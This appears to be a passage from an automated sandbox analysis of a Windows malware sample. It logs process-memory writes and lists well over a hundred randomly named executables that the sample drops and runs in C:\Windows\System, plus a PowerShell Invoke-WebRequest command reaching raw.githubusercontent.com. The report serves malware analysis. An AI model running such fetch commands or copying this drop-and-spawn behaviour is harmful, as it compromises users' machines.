PID 1600 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\xvHeImQ.exe
PID 1600 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\xvHeImQ.exe
PID 1600 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\xvHeImQ.exe
PID 1600 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XWhXKiz.exe
PID 1600 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XWhXKiz.exe
PID 1600 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XWhXKiz.exe
PID 1600 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\liMpmKv.exe
PID 1600 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\liMpmKv.exe
PID 1600 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\liMpmKv.exe
PID 1600 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\plupKYM.exe
PID 1600 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\plupKYM.exe
PID 1600 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\plupKYM.exe
PID 1600 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\FdiSYks.exe
PID 1600 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\FdiSYks.exe
PID 1600 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\FdiSYks.exe
PID 1600 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ADELqbG.exe
PID 1600 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ADELqbG.exe
PID 1600 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ADELqbG.exe
PID 1600 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\RMWtnjz.exe
PID 1600 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\RMWtnjz.exe
PID 1600 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\RMWtnjz.exe
PID 1600 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EjtWVbQ.exe
PID 1600 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EjtWVbQ.exe
PID 1600 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EjtWVbQ.exe
PID 1600 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\uLLcFTT.exe
PID 1600 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\uLLcFTT.exe
PID 1600 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\uLLcFTT.exe
PID 1600 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\cdaHRpZ.exe
PID 1600 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\cdaHRpZ.exe
PID 1600 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\cdaHRpZ.exe
PID 1600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qlRKsKJ.exe
PID 1600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qlRKsKJ.exe
PID 1600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qlRKsKJ.exe
PID 1600 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\MNTgqrx.exe
PID 1600 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\MNTgqrx.exe
PID 1600 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\MNTgqrx.exe
PID 1600 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qcypcLz.exe
PID 1600 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qcypcLz.exe
PID 1600 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qcypcLz.exe
PID 1600 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ebLBrBw.exe
PID 1600 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ebLBrBw.exe
PID 1600 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ebLBrBw.exe
PID 1600 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\vmvEDaL.exe
PID 1600 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\vmvEDaL.exe
PID 1600 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\vmvEDaL.exe
PID 1600 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\JGtYHFa.exe
PID 1600 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\JGtYHFa.exe
PID 1600 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\JGtYHFa.exe
PID 1600 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\PhEMEYy.exe
PID 1600 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\PhEMEYy.exe
PID 1600 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\PhEMEYy.exe
PID 1600 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EvkUEIs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\boMoguf.exe

C:\Windows\System\boMoguf.exe

C:\Windows\System\iQoVlVu.exe

C:\Windows\System\iQoVlVu.exe

C:\Windows\System\XmUppaC.exe

C:\Windows\System\XmUppaC.exe

C:\Windows\System\xvHeImQ.exe

C:\Windows\System\xvHeImQ.exe

C:\Windows\System\XWhXKiz.exe

C:\Windows\System\XWhXKiz.exe

C:\Windows\System\liMpmKv.exe

C:\Windows\System\liMpmKv.exe

C:\Windows\System\plupKYM.exe

C:\Windows\System\plupKYM.exe

C:\Windows\System\FdiSYks.exe

C:\Windows\System\FdiSYks.exe

C:\Windows\System\ADELqbG.exe

C:\Windows\System\ADELqbG.exe

C:\Windows\System\RMWtnjz.exe

C:\Windows\System\RMWtnjz.exe

C:\Windows\System\EjtWVbQ.exe

C:\Windows\System\EjtWVbQ.exe

C:\Windows\System\uLLcFTT.exe

C:\Windows\System\uLLcFTT.exe

C:\Windows\System\cdaHRpZ.exe

C:\Windows\System\cdaHRpZ.exe

C:\Windows\System\qlRKsKJ.exe

C:\Windows\System\qlRKsKJ.exe

C:\Windows\System\MNTgqrx.exe

C:\Windows\System\MNTgqrx.exe

C:\Windows\System\qcypcLz.exe

C:\Windows\System\qcypcLz.exe

C:\Windows\System\ebLBrBw.exe

C:\Windows\System\ebLBrBw.exe

C:\Windows\System\vmvEDaL.exe

C:\Windows\System\vmvEDaL.exe

C:\Windows\System\JGtYHFa.exe

C:\Windows\System\JGtYHFa.exe

C:\Windows\System\PhEMEYy.exe

C:\Windows\System\PhEMEYy.exe

C:\Windows\System\EvkUEIs.exe

C:\Windows\System\EvkUEIs.exe

C:\Windows\System\wyKiHFz.exe

C:\Windows\System\wyKiHFz.exe

C:\Windows\System\DdXURTq.exe

C:\Windows\System\DdXURTq.exe

C:\Windows\System\GEuQvGW.exe

C:\Windows\System\GEuQvGW.exe

C:\Windows\System\dSNZCQF.exe

C:\Windows\System\dSNZCQF.exe

C:\Windows\System\nDPBRxQ.exe

C:\Windows\System\nDPBRxQ.exe

C:\Windows\System\lkeyDyB.exe

C:\Windows\System\lkeyDyB.exe

C:\Windows\System\OfpgkLf.exe

C:\Windows\System\OfpgkLf.exe

C:\Windows\System\oamUrnf.exe

C:\Windows\System\oamUrnf.exe

C:\Windows\System\bslXWOc.exe

C:\Windows\System\bslXWOc.exe

C:\Windows\System\AFSEpfB.exe

C:\Windows\System\AFSEpfB.exe

C:\Windows\System\sMjQmSh.exe

C:\Windows\System\sMjQmSh.exe

C:\Windows\System\LNcqjwO.exe

C:\Windows\System\LNcqjwO.exe

C:\Windows\System\JqXWfGK.exe

C:\Windows\System\JqXWfGK.exe

C:\Windows\System\QUuRjPJ.exe

C:\Windows\System\QUuRjPJ.exe

C:\Windows\System\YSVUtZS.exe

C:\Windows\System\YSVUtZS.exe

C:\Windows\System\hMZHoYw.exe

C:\Windows\System\hMZHoYw.exe

C:\Windows\System\qUQgRPL.exe

C:\Windows\System\qUQgRPL.exe

C:\Windows\System\KSiCwAU.exe

C:\Windows\System\KSiCwAU.exe

C:\Windows\System\VmhBdBB.exe

C:\Windows\System\VmhBdBB.exe

C:\Windows\System\mSTTUhV.exe

C:\Windows\System\mSTTUhV.exe

C:\Windows\System\DStCmgL.exe

C:\Windows\System\DStCmgL.exe

C:\Windows\System\jyLsbwn.exe

C:\Windows\System\jyLsbwn.exe

C:\Windows\System\ZoEZcyu.exe

C:\Windows\System\ZoEZcyu.exe

C:\Windows\System\jLlKNww.exe

C:\Windows\System\jLlKNww.exe

C:\Windows\System\gKTEGyA.exe

C:\Windows\System\gKTEGyA.exe

C:\Windows\System\lVDJAca.exe

C:\Windows\System\lVDJAca.exe

C:\Windows\System\TGOMiZg.exe

C:\Windows\System\TGOMiZg.exe

C:\Windows\System\gdIGmEO.exe

C:\Windows\System\gdIGmEO.exe

C:\Windows\System\WRuqRhu.exe

C:\Windows\System\WRuqRhu.exe

C:\Windows\System\zzPVvQy.exe

C:\Windows\System\zzPVvQy.exe

C:\Windows\System\RyPiaWN.exe

C:\Windows\System\RyPiaWN.exe

C:\Windows\System\uUvbHaL.exe

C:\Windows\System\uUvbHaL.exe

C:\Windows\System\ExGEuVW.exe

C:\Windows\System\ExGEuVW.exe

C:\Windows\System\jlIDvOK.exe

C:\Windows\System\jlIDvOK.exe

C:\Windows\System\EvhosdO.exe

C:\Windows\System\EvhosdO.exe

C:\Windows\System\kPGQmsO.exe

C:\Windows\System\kPGQmsO.exe

C:\Windows\System\zTxUbIJ.exe

C:\Windows\System\zTxUbIJ.exe

C:\Windows\System\aRrORpy.exe

C:\Windows\System\aRrORpy.exe

C:\Windows\System\uCmFlfk.exe

C:\Windows\System\uCmFlfk.exe

C:\Windows\System\qZVsdEd.exe

C:\Windows\System\qZVsdEd.exe

C:\Windows\System\ABsWUOs.exe

C:\Windows\System\ABsWUOs.exe

C:\Windows\System\fWHsKGW.exe

C:\Windows\System\fWHsKGW.exe

C:\Windows\System\RCqywIx.exe

C:\Windows\System\RCqywIx.exe

C:\Windows\System\lueiLJN.exe

C:\Windows\System\lueiLJN.exe

C:\Windows\System\FdzajaR.exe

C:\Windows\System\FdzajaR.exe

C:\Windows\System\KLoncVM.exe

C:\Windows\System\KLoncVM.exe

C:\Windows\System\QEmsmkE.exe

C:\Windows\System\QEmsmkE.exe

C:\Windows\System\ToElgib.exe

C:\Windows\System\ToElgib.exe

C:\Windows\System\MNaBpNr.exe

C:\Windows\System\MNaBpNr.exe

C:\Windows\System\XVXxsSQ.exe

C:\Windows\System\XVXxsSQ.exe

C:\Windows\System\OCzJOEC.exe

C:\Windows\System\OCzJOEC.exe

C:\Windows\System\fFczAbp.exe

C:\Windows\System\fFczAbp.exe

C:\Windows\System\DtGIwKq.exe

C:\Windows\System\DtGIwKq.exe

C:\Windows\System\hLNcngN.exe

C:\Windows\System\hLNcngN.exe

C:\Windows\System\lLiweAI.exe

C:\Windows\System\lLiweAI.exe

C:\Windows\System\BRIAtrj.exe

C:\Windows\System\BRIAtrj.exe

C:\Windows\System\FkfOhmV.exe

C:\Windows\System\FkfOhmV.exe

C:\Windows\System\ynDWUky.exe

C:\Windows\System\ynDWUky.exe

C:\Windows\System\ueQCHFK.exe

C:\Windows\System\ueQCHFK.exe

C:\Windows\System\WtosUlb.exe

C:\Windows\System\WtosUlb.exe

C:\Windows\System\TvrxoJW.exe

C:\Windows\System\TvrxoJW.exe

C:\Windows\System\PKYMEqq.exe

C:\Windows\System\PKYMEqq.exe

C:\Windows\System\KpXkKRz.exe

C:\Windows\System\KpXkKRz.exe

C:\Windows\System\wVPeFFK.exe

C:\Windows\System\wVPeFFK.exe

C:\Windows\System\qNaqkiI.exe

C:\Windows\System\qNaqkiI.exe

C:\Windows\System\ZSENtTf.exe

C:\Windows\System\ZSENtTf.exe

C:\Windows\System\rucfsEs.exe

C:\Windows\System\rucfsEs.exe

C:\Windows\System\HTopyum.exe

C:\Windows\System\HTopyum.exe

C:\Windows\System\OmddmKr.exe

C:\Windows\System\OmddmKr.exe

C:\Windows\System\gaZhaVn.exe

C:\Windows\System\gaZhaVn.exe

C:\Windows\System\tpMZWlW.exe

C:\Windows\System\tpMZWlW.exe

C:\Windows\System\ebxWDHI.exe

C:\Windows\System\ebxWDHI.exe

C:\Windows\System\qIbLhMr.exe

C:\Windows\System\qIbLhMr.exe

C:\Windows\System\TQNyYVw.exe

C:\Windows\System\TQNyYVw.exe

C:\Windows\System\kahtnMP.exe

C:\Windows\System\kahtnMP.exe

C:\Windows\System\gGKKHrV.exe

C:\Windows\System\gGKKHrV.exe

C:\Windows\System\VGTFVkL.exe

C:\Windows\System\VGTFVkL.exe

C:\Windows\System\vuHRHyl.exe

C:\Windows\System\vuHRHyl.exe

C:\Windows\System\lCsvLjH.exe

C:\Windows\System\lCsvLjH.exe

C:\Windows\System\IDDNZDP.exe

C:\Windows\System\IDDNZDP.exe

C:\Windows\System\kCeVlPk.exe

C:\Windows\System\kCeVlPk.exe

C:\Windows\System\BrlhvvS.exe

C:\Windows\System\BrlhvvS.exe

C:\Windows\System\lrWKvag.exe

C:\Windows\System\lrWKvag.exe

C:\Windows\System\WOYOYvG.exe

C:\Windows\System\WOYOYvG.exe

C:\Windows\System\vtnGKOV.exe

C:\Windows\System\vtnGKOV.exe

C:\Windows\System\CgOqAUc.exe

C:\Windows\System\CgOqAUc.exe

C:\Windows\System\uBVVGhF.exe

C:\Windows\System\uBVVGhF.exe

C:\Windows\System\gHnqmDT.exe

C:\Windows\System\gHnqmDT.exe

C:\Windows\System\NiWHdXj.exe

C:\Windows\System\NiWHdXj.exe

C:\Windows\System\CzbwqJF.exe

C:\Windows\System\CzbwqJF.exe

C:\Windows\System\RGXhvSH.exe

C:\Windows\System\RGXhvSH.exe

C:\Windows\System\nKxOzgb.exe

C:\Windows\System\nKxOzgb.exe

C:\Windows\System\aGyJTwe.exe

C:\Windows\System\aGyJTwe.exe

C:\Windows\System\tTHgdnr.exe

C:\Windows\System\tTHgdnr.exe

C:\Windows\System\PFqiDjG.exe

C:\Windows\System\PFqiDjG.exe

C:\Windows\System\ITVMGiY.exe

C:\Windows\System\ITVMGiY.exe

C:\Windows\System\tLmJjxB.exe

C:\Windows\System\tLmJjxB.exe

C:\Windows\System\qrPiQUC.exe

C:\Windows\System\qrPiQUC.exe

C:\Windows\System\BVvOSXN.exe

C:\Windows\System\BVvOSXN.exe

C:\Windows\System\fFvkIkS.exe

C:\Windows\System\fFvkIkS.exe

C:\Windows\System\dYZNfgI.exe

C:\Windows\System\dYZNfgI.exe

C:\Windows\System\TVgFWLH.exe

C:\Windows\System\TVgFWLH.exe

C:\Windows\System\OIeFhIO.exe

C:\Windows\System\OIeFhIO.exe

C:\Windows\System\UCoAKkk.exe

C:\Windows\System\UCoAKkk.exe

C:\Windows\System\kOrechJ.exe

C:\Windows\System\kOrechJ.exe

C:\Windows\System\CZVztsS.exe

C:\Windows\System\CZVztsS.exe

C:\Windows\System\vBcjQsC.exe

C:\Windows\System\vBcjQsC.exe

C:\Windows\System\MdAIDYV.exe

C:\Windows\System\MdAIDYV.exe

C:\Windows\System\sgPfuiE.exe

C:\Windows\System\sgPfuiE.exe

C:\Windows\System\psJKAUZ.exe

C:\Windows\System\psJKAUZ.exe

C:\Windows\System\gPHgJim.exe

C:\Windows\System\gPHgJim.exe

C:\Windows\System\bOAkAEV.exe

C:\Windows\System\bOAkAEV.exe

C:\Windows\System\eGrAoUR.exe

C:\Windows\System\eGrAoUR.exe

C:\Windows\System\cDHjyzk.exe

C:\Windows\System\cDHjyzk.exe

C:\Windows\System\OyANdLT.exe

C:\Windows\System\OyANdLT.exe

C:\Windows\System\YiLxOUl.exe

C:\Windows\System\YiLxOUl.exe

C:\Windows\System\EOWcHzM.exe

C:\Windows\System\EOWcHzM.exe

C:\Windows\System\mTSbrjF.exe

C:\Windows\System\mTSbrjF.exe

C:\Windows\System\OpMbepO.exe

C:\Windows\System\OpMbepO.exe

C:\Windows\System\esHyvPv.exe

C:\Windows\System\esHyvPv.exe

C:\Windows\System\zVMEaGq.exe

C:\Windows\System\zVMEaGq.exe

C:\Windows\System\JUmTKgF.exe

C:\Windows\System\JUmTKgF.exe

C:\Windows\System\SPYVskn.exe

C:\Windows\System\SPYVskn.exe

C:\Windows\System\cdRVEJc.exe

C:\Windows\System\cdRVEJc.exe

C:\Windows\System\jPwSLaA.exe

C:\Windows\System\jPwSLaA.exe

C:\Windows\System\uepRSxt.exe

C:\Windows\System\uepRSxt.exe

C:\Windows\System\MDumzGc.exe

C:\Windows\System\MDumzGc.exe

C:\Windows\System\sDnHzcD.exe

C:\Windows\System\sDnHzcD.exe

C:\Windows\System\ybSIIiQ.exe

C:\Windows\System\ybSIIiQ.exe

C:\Windows\System\lFsARWC.exe

C:\Windows\System\lFsARWC.exe

C:\Windows\System\sfHTzfw.exe

C:\Windows\System\sfHTzfw.exe

C:\Windows\System\gVPUGpQ.exe

C:\Windows\System\gVPUGpQ.exe

C:\Windows\System\iJUraNi.exe

C:\Windows\System\iJUraNi.exe

C:\Windows\System\mIktqrk.exe

C:\Windows\System\mIktqrk.exe

C:\Windows\System\OoLIFYe.exe

C:\Windows\System\OoLIFYe.exe

C:\Windows\System\QDJcpEI.exe

C:\Windows\System\QDJcpEI.exe

C:\Windows\System\vKMibVG.exe

C:\Windows\System\vKMibVG.exe

C:\Windows\System\plDrfaU.exe

C:\Windows\System\plDrfaU.exe

C:\Windows\System\EfdHzkU.exe

C:\Windows\System\EfdHzkU.exe

C:\Windows\System\TggdHmx.exe

C:\Windows\System\TggdHmx.exe

C:\Windows\System\kqfdiUT.exe

C:\Windows\System\kqfdiUT.exe

C:\Windows\System\zfwexHw.exe

C:\Windows\System\zfwexHw.exe

C:\Windows\System\ZodYChe.exe

C:\Windows\System\ZodYChe.exe

C:\Windows\System\iDJMYMp.exe

C:\Windows\System\iDJMYMp.exe

C:\Windows\System\dVWJImG.exe

C:\Windows\System\dVWJImG.exe

C:\Windows\System\zxXPPqh.exe

C:\Windows\System\zxXPPqh.exe

C:\Windows\System\ZvlNkdS.exe

C:\Windows\System\ZvlNkdS.exe

C:\Windows\System\QzYcENJ.exe

C:\Windows\System\QzYcENJ.exe

C:\Windows\System\iginMdL.exe

C:\Windows\System\iginMdL.exe

C:\Windows\System\BtSqDpg.exe

C:\Windows\System\BtSqDpg.exe

C:\Windows\System\cPJadDu.exe

C:\Windows\System\cPJadDu.exe

C:\Windows\System\hmWKeYV.exe

C:\Windows\System\hmWKeYV.exe

C:\Windows\System\UAJxklf.exe

C:\Windows\System\UAJxklf.exe

C:\Windows\System\gOmuAJQ.exe

C:\Windows\System\gOmuAJQ.exe

C:\Windows\System\EleUfEg.exe

C:\Windows\System\EleUfEg.exe

C:\Windows\System\MBdtcMs.exe

C:\Windows\System\MBdtcMs.exe

C:\Windows\System\bPcVHKO.exe

C:\Windows\System\bPcVHKO.exe

C:\Windows\System\EDYfwrk.exe

C:\Windows\System\EDYfwrk.exe

C:\Windows\System\kiVCRXg.exe

C:\Windows\System\kiVCRXg.exe

C:\Windows\System\yLDbYjl.exe

C:\Windows\System\yLDbYjl.exe

C:\Windows\System\YTesXVU.exe

C:\Windows\System\YTesXVU.exe

C:\Windows\System\ejodCJv.exe

C:\Windows\System\ejodCJv.exe

C:\Windows\System\DeDMKcz.exe

C:\Windows\System\DeDMKcz.exe

C:\Windows\System\QrzaSMG.exe

C:\Windows\System\QrzaSMG.exe

C:\Windows\System\mVGjqJG.exe

C:\Windows\System\mVGjqJG.exe

C:\Windows\System\cMuuyrw.exe

C:\Windows\System\cMuuyrw.exe

C:\Windows\System\AcCPNkg.exe

C:\Windows\System\AcCPNkg.exe

C:\Windows\System\uGpZEjl.exe

C:\Windows\System\uGpZEjl.exe

C:\Windows\System\XBuIRIX.exe

C:\Windows\System\XBuIRIX.exe

C:\Windows\System\bwzZwdr.exe

C:\Windows\System\bwzZwdr.exe

C:\Windows\System\xYWBLTL.exe

C:\Windows\System\xYWBLTL.exe

C:\Windows\System\imNkznx.exe

C:\Windows\System\imNkznx.exe

C:\Windows\System\kQgZgmh.exe

C:\Windows\System\kQgZgmh.exe

C:\Windows\System\AtAlLSN.exe

C:\Windows\System\AtAlLSN.exe

C:\Windows\System\jYsbDXu.exe

C:\Windows\System\jYsbDXu.exe

C:\Windows\System\MbVDyUe.exe

C:\Windows\System\MbVDyUe.exe

C:\Windows\System\ycjFAHE.exe

C:\Windows\System\ycjFAHE.exe

C:\Windows\System\eGPscQm.exe

C:\Windows\System\eGPscQm.exe

C:\Windows\System\eSDpPKH.exe

C:\Windows\System\eSDpPKH.exe

C:\Windows\System\SwFqgUi.exe

C:\Windows\System\SwFqgUi.exe

C:\Windows\System\qLEhstN.exe

C:\Windows\System\qLEhstN.exe

C:\Windows\System\nLwqxjs.exe

C:\Windows\System\nLwqxjs.exe

C:\Windows\System\qoeAWJV.exe

C:\Windows\System\qoeAWJV.exe

C:\Windows\System\TPnZjVq.exe

C:\Windows\System\TPnZjVq.exe

C:\Windows\System\bPAZftU.exe

C:\Windows\System\bPAZftU.exe

C:\Windows\System\zyleMEl.exe

C:\Windows\System\zyleMEl.exe

C:\Windows\System\SEhICNc.exe

C:\Windows\System\SEhICNc.exe

C:\Windows\System\kzAVVda.exe

C:\Windows\System\kzAVVda.exe

C:\Windows\System\YMLosop.exe

C:\Windows\System\YMLosop.exe

C:\Windows\System\wWuqnaT.exe

C:\Windows\System\wWuqnaT.exe

C:\Windows\System\veripea.exe

C:\Windows\System\veripea.exe

C:\Windows\System\BwpmggX.exe

C:\Windows\System\BwpmggX.exe

C:\Windows\System\JJtppCE.exe

C:\Windows\System\JJtppCE.exe

C:\Windows\System\HtjFdJO.exe

C:\Windows\System\HtjFdJO.exe

C:\Windows\System\OwLkAhg.exe

C:\Windows\System\OwLkAhg.exe

C:\Windows\System\icddqiD.exe

C:\Windows\System\icddqiD.exe

C:\Windows\System\agAFnBc.exe

C:\Windows\System\agAFnBc.exe

C:\Windows\System\yBxaRBw.exe

C:\Windows\System\yBxaRBw.exe

C:\Windows\System\pxoirqo.exe

C:\Windows\System\pxoirqo.exe

C:\Windows\System\SaeTknb.exe

C:\Windows\System\SaeTknb.exe

C:\Windows\System\emEEayu.exe

C:\Windows\System\emEEayu.exe

C:\Windows\System\BPwiivZ.exe

C:\Windows\System\BPwiivZ.exe

C:\Windows\System\RMLJARH.exe

C:\Windows\System\RMLJARH.exe

C:\Windows\System\bUourMy.exe

C:\Windows\System\bUourMy.exe

C:\Windows\System\XdBlcRm.exe

C:\Windows\System\XdBlcRm.exe

C:\Windows\System\STHjxJi.exe

C:\Windows\System\STHjxJi.exe

C:\Windows\System\DYNhlyN.exe

C:\Windows\System\DYNhlyN.exe

C:\Windows\System\kKBsRPe.exe

C:\Windows\System\kKBsRPe.exe

C:\Windows\System\IvyYYtq.exe

C:\Windows\System\IvyYYtq.exe

C:\Windows\System\KRPLTVK.exe

C:\Windows\System\KRPLTVK.exe

C:\Windows\System\uzIDDWA.exe

C:\Windows\System\uzIDDWA.exe

C:\Windows\System\oaMAxjU.exe

C:\Windows\System\oaMAxjU.exe

C:\Windows\System\KmGowCD.exe

C:\Windows\System\KmGowCD.exe

C:\Windows\System\sTCVwQf.exe

C:\Windows\System\sTCVwQf.exe

C:\Windows\System\YfIvLNj.exe

C:\Windows\System\YfIvLNj.exe

C:\Windows\System\uAnbXWy.exe

C:\Windows\System\uAnbXWy.exe

C:\Windows\System\kjbBSiP.exe

C:\Windows\System\kjbBSiP.exe

C:\Windows\System\FTDTLJJ.exe

C:\Windows\System\FTDTLJJ.exe

C:\Windows\System\qcRvFDR.exe

C:\Windows\System\qcRvFDR.exe

C:\Windows\System\MywaRry.exe

C:\Windows\System\MywaRry.exe

C:\Windows\System\rvLxlxI.exe

C:\Windows\System\rvLxlxI.exe

C:\Windows\System\Sqzmqwb.exe

C:\Windows\System\Sqzmqwb.exe

C:\Windows\System\OoeYLPf.exe

C:\Windows\System\OoeYLPf.exe

C:\Windows\System\duveIup.exe

C:\Windows\System\duveIup.exe

C:\Windows\System\lxQjwdF.exe

C:\Windows\System\lxQjwdF.exe

C:\Windows\System\qItNoJu.exe

C:\Windows\System\qItNoJu.exe

C:\Windows\System\MHsvBOc.exe

C:\Windows\System\MHsvBOc.exe

C:\Windows\System\cMHndAg.exe

C:\Windows\System\cMHndAg.exe

C:\Windows\System\sxwRjVn.exe

C:\Windows\System\sxwRjVn.exe

C:\Windows\System\VfZSrpk.exe

C:\Windows\System\VfZSrpk.exe

C:\Windows\System\kaZsOQk.exe

C:\Windows\System\kaZsOQk.exe

C:\Windows\System\BVqutim.exe

